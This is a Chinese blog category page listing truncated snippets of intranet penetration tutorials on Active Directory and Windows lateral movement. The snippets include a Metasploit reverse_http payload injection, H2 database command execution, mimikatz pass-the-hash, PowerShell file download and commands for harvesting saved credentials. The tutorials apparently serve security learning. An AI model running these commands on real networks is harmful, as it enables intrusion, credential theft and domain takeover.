内网蠕动
文章平均质量分 63
内网蠕动
whojoe
一个想学reverse的web狗
展开
-
nmap使用nps的socks5模式端口扫描问题
nmap使用nps的socks5模式端口扫描问题前言代码查看前言在使用nmap挂nps的socks5时候proxychains nmap -Pn -sT 127.0.0.1 -p 99会扫任何端口都打开socks5认证部分请参考socks5认证过程代码查看在nps\server\proxy\socks5.go中首先打开start,调用handleConn//startfunc (s *Sock5ModeServer) Start() error { return conn.NewT原创 2021-11-23 19:51:06 · 2776 阅读 · 4 评论 -
msf注入payload
msf注入payloadbash参考文章bashuse exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset DisablePayloadHandler trueset lhost 192.168.3.1set lport 12121set session 1参考文章https://www.cnblogs.com/hcrk/p/14419762.html...原创 2021-11-19 10:08:20 · 542 阅读 · 0 评论 -
ldap信息收集方法(不断补充)
ldap信息收集方法(不断补充)查询与控制器主机名ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "OU=Domain Controllers,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306369)"|grep dNSHostName查询域管理用户ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -原创 2021-08-30 17:19:37 · 755 阅读 · 0 评论 -
CVE-2018-8581 漏洞分析
CVE-2018-8581 漏洞分析前言环境搭建工具分析前言这里只是简单分析漏洞产生的代码逻辑,因为不熟悉exchange的业务逻辑,所以分析不会很深入,争取以后慢慢补充环境搭建主机机器名ip用户密码版本域控1ad1.test.com192.168.164.174administratorAa1234win2012r2exchange2016-cu11mail1.test.com192.168.164.173administratorAa1234原创 2021-08-27 16:38:05 · 2694 阅读 · 0 评论 -
CVE-2018-8581漏洞复现
CVE-2018-8581漏洞复现环境搭建漏洞复现参考文章环境搭建主机机器名ip用户密码版本域控1ad1.test.com192.168.164.174administratorAa1234win2012r2exchange2016-粗1mail1.test.com192.168.164.173administratorAa1234win2012r2域内机器user.test.com192.168.164.129user1Uu1234.原创 2021-08-26 16:33:50 · 1023 阅读 · 1 评论 -
查看exchange版本
查看exchange版本方法通过web页面通过exchange Management Shell打开exchange toolbox通过powershell方法通过web页面view-source:https://192.168.164.173/owa/这里是15.1.1591.8在微软文档里面搜索https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?view=exchse原创 2021-08-25 18:07:29 · 2485 阅读 · 0 评论 -
CVE-2019-1040漏洞分析学习
CVE-2019-1040漏洞分析学习前言分析参考文章前言前面写到在PetitPotam漏洞复现时可以结合CVE-2019-1040进行利用,绕过ntlm认证的mic校验。而且无法通过中继自己的smb到自己的ldap,这是由于ldap需要协商签名,域控默认开启smb签名,并且存在mic防止篡改,如果绕过mic的校验就可以使smb中继到ldap进行利用,当然如果是http或者webadv的 不要求签名,可以参考。当然还有一个问题就是无法使用自己的smb中继到自己的ldap,由于微软修复了ms08-06原创 2021-08-13 16:00:42 · 1405 阅读 · 0 评论 -
域渗透 - 权限维持 SID History
域渗透 - 权限维持 SID History环境搭建SID History属性介绍利用条件利用同一个域内同一域树下的提权利用方式参考文章环境搭建这里需要父子域可以参考https://blog.csdn.net/qq_43645782/article/details/119330508机器名ip用户密码dnsfad.test.com192.168.164.146administratorAa1234192.168.164.146cad.ch.test.com原创 2021-08-03 19:18:15 · 431 阅读 · 0 评论 -
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
PetitPotam漏洞复现环境搭建漏洞复现参考文章环境搭建主机机器名ip用户密码版本域控1ad.test.com192.168.164.147administratorAa1234win2012r2域控2ad2.test.com192.168.164.146administratorAa1234win2012r2域内机器user.test.com192.168.164.129user1Uu1234.win2008r2kali原创 2021-08-02 14:15:47 · 3384 阅读 · 0 评论 -
XXE到域控复现
XXE到域控复现前言环境搭建漏洞复现首先通过域账户添加一个计算机账户开启中继获取票据加载票据使用使用域用户尝试参考文章前言前面学习了基于资源的约束委派,也遇到了一些问题,就是域账户中继后无法成功修改委派属性,这里用服务账户权限测试一下环境搭建主机机器名ip用户密码版本域控ad.test.com192.168.164.147administratorAa1234win2012r2域内机器user.test.com192.168.164.129user1原创 2021-07-21 15:12:26 · 403 阅读 · 0 评论 -
基于资源的约束委派(RBCD)学习
基于资源的约束委派(RBCD)学习原理环境搭建利用添加机器账户中继&委派无另一台机器权限有另一台机器权限参考文章原理环境搭建主机机器名ip用户密码版本域控ad.test.com192.168.164.147administratorAa1234win2012r2域内机器user.test.com192.168.164.129user1Uu1234.win2008r2域内机器user2.test.com192.168.164.150原创 2021-07-21 10:25:09 · 3133 阅读 · 0 评论 -
非约束委派账户配合printerbug域内提权
非约束委派账户配合printerbug域内提权环境搭建配置非约束委派漏洞复现本地远程环境搭建主机机器名ip用户版本域控ad.test.com192.168.164.147administratorwin2012r2域内机器user.test.com192.168.164.129user1win2008r2配置非约束委派漏洞复现本地https://github.com/leechristensen/SpoolSample/.https://原创 2021-07-16 16:42:05 · 1021 阅读 · 1 评论 -
域渗透-kerberos协议分析
域渗透-kerberos协议分析环境搭建名词解释认证过程AS-REQ抓包的真实情况AS-REP用户名和密码正确(第二个包)用户名不正确(第一个包)用户名正确(第一个包)密码不正确(只有第一个包,无第二个包)TGS-REQTGS-REPST认证参考文章文章中对之前的文章提出了一些疑问,如果发现有错误,还望斧正环境搭建这里的域环境搭建就不再细说主机ip用户主机名域控192.168.164.133administratorad.test.com域内主机192.168.原创 2021-07-13 17:31:21 · 1674 阅读 · 2 评论 -
域渗透——Kerberos委派攻击
域渗透——Kerberos委派攻击前言环境搭建创建非约束委派账户创建约束委派账户发现域内委派的用户和计算机ldapsearch查找非约束用户查找非约束机器查找约束用户查找约束机器ADfind查找非约束委派用户查找非约束委派主机查找约束委派用户查找非约束委派主机PowerView查找非约束委派用户查找非约束委派主机查找约束委派用户查找约束委派主机非约束委派的利用触发约束委派的利用利用防御参考文章前言本文章重点说一下约束委派和非约束委派,,这里的非约束委派需要手动触发比较鸡肋,可以使用非约束委派账户配合pr原创 2021-07-12 18:01:00 · 1498 阅读 · 0 评论 -
CVE-2020-1472域内提权漏洞复现
CVE-2020-1472域内提权漏洞复现环境漏洞复现mimikatz查看原本hashpoc重置密码获取密码恢复密码查看恢复的密码python重置密码获取域管密码1获取域控机器密码1获取域控机器密码2恢复域控密码查看恢复的密码参考文章环境ad 192.168.164.129user 192.168.164.133kali 192.168.164.x漏洞复现mimikatz查看原本hashmimikatz.exe "privilege::debug" "sekurlsa::logonpassw原创 2021-07-08 15:47:11 · 893 阅读 · 0 评论 -
cve-2021-21985漏洞复现
cve-2021-21985漏洞复现受影响的版本:漏洞复现后续利用参考文章受影响的版本:VMware vCenter Server 7.0系列 < 7.0.U2bVMware vCenter Server 6.7系列 < 6.7.U3nVMware vCenter Server 6.5系列 < 6.5 U3pVMware Cloud Foundation 4.x 系列 < 4.2.1VMware Cloud Foundation 4.x 系列 < 3.10.2.1原创 2021-06-09 15:09:40 · 6632 阅读 · 2 评论 -
SPN(Service Principal Names)
SPN(Service Principal Names)SPN注册SPNSPN查询setspn.exePowerShell-AD-ReconGetUserSPNSPowerView.ps1利用参考文章SPN服务主体名称(Service Principal Names)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPN。SPN分为两种原创 2021-05-24 16:35:28 · 2532 阅读 · 0 评论 -
域渗透-Kerberoasting Attack
域渗透-Kerberoasting Attack一、概述二、Kerberoasting攻击流程三、请求服务票据PowershellmimikatzGetUserSPNs查看票据是否申请成功klistMimikatzMSFRiskySPN导出票据mimikatzkerberoastGet-TGSCipher破解票据重写服务票据&RAM注入后门利用参考文章一、概述黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与S原创 2021-05-28 14:00:43 · 870 阅读 · 0 评论 -
windows无exe
windows无exe加载脚本方式恶意脚本加载powershellmshta.exeCScript.exe&WScript.exeWindows原生工具加载regsvr32.exedllsctcertutil.exewinrm.vbsmsiexec.exewmic.exepubprn.vbs参考加载脚本方式利用Windows自带的解析器:PowerShell、VBScript、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.ex原创 2021-05-22 20:11:56 · 207 阅读 · 0 评论 -
nbtscan在windows和linux下编译
nbtscan在windows和linux下编译windows下载编译linux下载编译参考文章windows下载http://unixwiz.net/tools/nbtscan-source-1.0.35.zip解压之后,修改nbtscan.c的66行include "getopt.i"为include "getopt.h"修改nbtscan_common.h为libcommon.h修改文件中nbtscan_common.h为libcommon.h编译CMakeLists.txtcma原创 2021-05-21 20:19:54 · 1337 阅读 · 0 评论 -
横向移动-WINRM
横向移动-WINRMWINRM前提远程管理1.winrs2.powershell端口复用参考文章WINRMWinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。通过HTTP(5985)或HTTPS SOAP(5986)执行通信,默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。使用此服务需要管理员级别凭据。前提双方都要开启winRM,并且可以通信Windows 2008 以上版本默认自动状态,Windows Vista/win7上必须手动启动;WinRS原创 2021-05-19 16:02:15 · 365 阅读 · 0 评论 -
域权限维持-银票
域权限维持-银票前提白银票据伪造利用1.在注入目标的Windows File Share(cifs)访问票据后,可以访问目标计算机上的任何共享,包括c $共享,能够将文件拷贝到目标系统上2.注入目标Scheduled Tasks服务(host)访问票据后,可以在目标机器上创建计划任务3.在注入http和wsman服务后,可以获得目标系统上的WinRM和Powershell远程管理的权限,验证失败4.在注入ldap服务票据后,可以获得目标系统上LDAP服务的管理权限,进而可以利用dcsync远程导出域控上的h原创 2021-05-19 14:57:10 · 234 阅读 · 0 评论 -
域权限维持-DSRM
域权限维持-DSRM简介更改DSRM密码的方式通过明文指定通过域账户同步DSRM利用使用DSRM账户连接的前提使用psexec或者wmiexec进行链接参考文章简介除了krbtgt服务帐号外,域控上还有个可利用的账户:目录服务还原模式(DSRM)账户,这个密码是在DC安装的时候设置的,所以一般不会被修改。但是微软对DSRM帐号进行了限制,只允许在控制台登录。可以通过修改注册表的方式,将如下注册表键值: HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdmin原创 2021-05-17 20:59:30 · 677 阅读 · 0 评论 -
rdp劫持学习
rdp劫持学习rdp服务确认启动通过注册表查询通过进程查看启动rdp中间人攻击登录shift后门结合rdp劫持多用户登录手动设置rdpwrap参考文章rdp服务确认启动通过注册表查询REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\C原创 2021-05-13 14:35:19 · 986 阅读 · 2 评论 -
windows linux多进程ping
windows 多进程ping代码ping一个c段使用方法ping ip列表使用方法参考代码ping一个c段ping.bat@echo off::写入getip.batecho @echo off>getip.batecho setlocal ENABLEDELAYEDEXPANSION>>getip.batecho set res=res\>>getip.batecho for /F %%%%k in ('ping %%1 -n 1 -w 500 ^^^|原创 2021-05-09 01:04:57 · 343 阅读 · 0 评论 -
python2的socks5代理 文件上传
python2的socks5代理 文件上传前言socks5+文件上传服务端客户端使用方法socks5文件上传注意参考文章前言在对linux机器进行打点时候,机器不出网,但是我们能链接到linux机器,在webshell无法传输文件,或者无法传输大文件时,可以使用python来作为服务端,因为大部分linux机器中内置python 不需要下载socks5+文件上传服务端# coding=utf-8import loggingimport selectimport socketimport s原创 2021-05-07 00:18:29 · 280 阅读 · 0 评论 -
h2数据库 getshell
h2数据库 getshell前提前提有数据库操作权限CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.nex原创 2021-03-26 15:28:08 · 623 阅读 · 0 评论 -
linux下命令不存在解决办法
linux下目录不存在解决办法查看yum安装软件目录查看已经安装软件目录如果无软件查看yum安装软件目录rpm -qa|grep nodejsrpm -ql nodejs-8.11.2-1nodesource.x86_64查看已经安装软件目录ls /binls /sbinls /usr/binls /usr/sbin如果无软件使用同版本系统进行安装,之后按照第一种方式找到之后复制执行chmod +x /tmp/traceroute/tmp/tracetoute 8.8.8.8原创 2021-03-23 11:40:48 · 1360 阅读 · 0 评论 -
linux加入域操作和linux在域下信息收集
linux加入域操作和linux在域下信息收集环境搭建修改linux机器的dns修改hostname安装必须组件加入域linux在域下信息收集机器账户域账户查询域控机器查询域管账户查询所有域账户查看加入域的所有计算机总结环境搭建域控 win2008r2 192.168.164.169linux centos7 192.168.164.179域 whoami.com现在已经有了一个域控,具体的方法可以自行搜索修改linux机器的dnsvim /etc/sysconfig/network-scr原创 2021-03-06 21:15:22 · 3582 阅读 · 0 评论 -
python将文本转换为bash可输入字符
python将文本转换为bash可输入字符需求代码需求将文本文件在bash下使用echo输出到文件代码#! /usr/bin/env python# _*_ coding:utf-8 _*_import osfrom urllib.parse import quotedef postfile(): i=0 #读取文件目录 with open('dirty.c', 'r') as f: for line in f.readlines():原创 2021-03-04 16:29:37 · 175 阅读 · 1 评论 -
linux本地提权sudo(CVE-2021-3156)漏洞复现
linux本地提权sudo(CVE-2021-3156)漏洞复现影响范围环境准备漏洞复现参考文章影响范围Sudo 1.8.2 - 1.8.31p2Sudo 1.9.0 - 1.9.5p1环境准备这里使用的是kali2020.2查看sudo版本在这里插入代码片执行sudoedit -s /如果返回root@kali:~# sudoedit -s /sudoedit: /:不是常规文件 #sudoedit: /: not a regular fileroot@kali:~#原创 2021-03-04 14:36:39 · 1195 阅读 · 2 评论 -
使用Responder获取ntlmv2 hash
使用Responder获取ntlmv2 hashResponder配置下载获取ntlmv2hash之后进行爆破获取ntlmv2使用hashcat爆破密码中继获得shell参考文章Responder配置下载https://github.com/lgandx/ResponderResponder工具可以污染LLMNR和NBT-NS请求。在目录下的Responder.conf可以配置启用的模块如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解如果要使用ntlm中原创 2021-03-03 17:52:53 · 1363 阅读 · 1 评论 -
读取winscp保存的密码
读取winscp保存的密码通过注册表查询脚本使用方法参考文章通过注册表查询reg query "HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" /s脚本# coding=utf-8import randomimport sys,osPWALG_SIMPLE = 1PWALG_SIMPLE_MAGIC = 0xA3PWALG_SIMPLE_STRING = '0123456789ABCDEF'PWALG_SIM原创 2021-02-19 23:52:05 · 1524 阅读 · 0 评论 -
读取mstsc历史密码
读取mstsc历史密码通过注册表查看历史记录通过本地Credentials读取记录使用mimikatz读取密码(需要保存过凭证的才可以)通过注册表查看历史记录reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Servers" /s通过本地Credentials读取记录dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*使用mimikat原创 2021-02-19 23:33:49 · 5358 阅读 · 0 评论 -
pth常用工具
pth常用工具实现rdpPTHCrackMapExec实现rdpwindowsprivilege::debugsekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin"kalixfreerdp /u:administrator /pth:d25ecd13fddbb542d2e16da4f9e0333d原创 2021-01-21 13:31:06 · 944 阅读 · 0 评论 -
内网代理转发以及httpserver
内网代理转发以及httpserverpythonhttp服务器windows文件下载ew参考文章pythonhttp服务器python2python -m SimpleHTTPServer 1337python3python -m http.server 1337php5.4php -S 0.0.0.0:1337windows文件下载powershellpowershell (new-object System.Net.WebClient).DownloadFile('http:/原创 2021-01-21 13:13:01 · 888 阅读 · 0 评论 -
域渗透常用基础命令
域渗透常用基础命令信息收集基础命令常用工具信息收集基础命令查询与控制器主机名net group “domain controllers” /domain查询域管理用户net group “domain admins” /domain查看所有域用户net user /domain查看加入域的所有计算机名net group "domain computers" /domain查看域密码策略net accounts /domain常用工具使用procdump将目标的lsass.原创 2021-01-21 13:03:01 · 673 阅读 · 0 评论 -
mssql堆叠注入利用总结
mssql堆叠注入利用总结前言环境写webshellxp_dirtreexp_dirtree杀软反应xp_cmdshellxp_cmdshell杀软反应通过命令执行拿shell无杀软有杀软通过差异备份写shell有杀软log备份有杀软遇到的问题sp_oacreate无杀软有杀软参考文章前言前一段时间遇到了两个mssql的注入,一个是可以限制长度的命令执行,另一个是网站可以注入,但是主机存在杀软,不可以使用xp_cmdshell,所以总结一下mssql堆叠注入环境下的函数利用,以及杀软的反应当然,下面的原创 2020-06-22 12:04:45 · 3636 阅读 · 1 评论 -
msf下MS17-010模块使用总结
msf下MS17-010模块使用总结前言环境搭建漏洞无杀软情况有杀软情况参考文章前言在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。环境搭建这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机kali 192.168.164.155靶机1 192.168.164.156靶机2 192.168.164.161(丢一个360的安装包进去,等会要用)靶机2还要开启命名管道的匿名访问打开cmd 执行g原创 2020-06-20 13:08:25 · 13156 阅读 · 1 评论 -
记一次asp+mssql的注入和命令执行(已脱敏)
记一次asp+mssql的注入和命令执行(已脱敏)前言复现总结前言前一段时间参加了一个活动,这一段时间学习了不少的东西,自己的知识提升的也比较快,这里选择几个比较典型的例子来分享一下,因为相关站点保密,所以均脱敏并且尽可能本地复现环境,这些例子也会分几篇文章来进行记录复现首先进行信息收集,之后发现在一个高端口开着一个论坛服务,于是打开站点进行常规的测试,在用户名处,在搜索框处,在输入单引号之后得到报错,我的输入有错误,这很有可能就是注入点,因为我之前没有做过asp+mssql的注入,于是马上去请教了原创 2020-06-18 21:48:52 · 2032 阅读 · 0 评论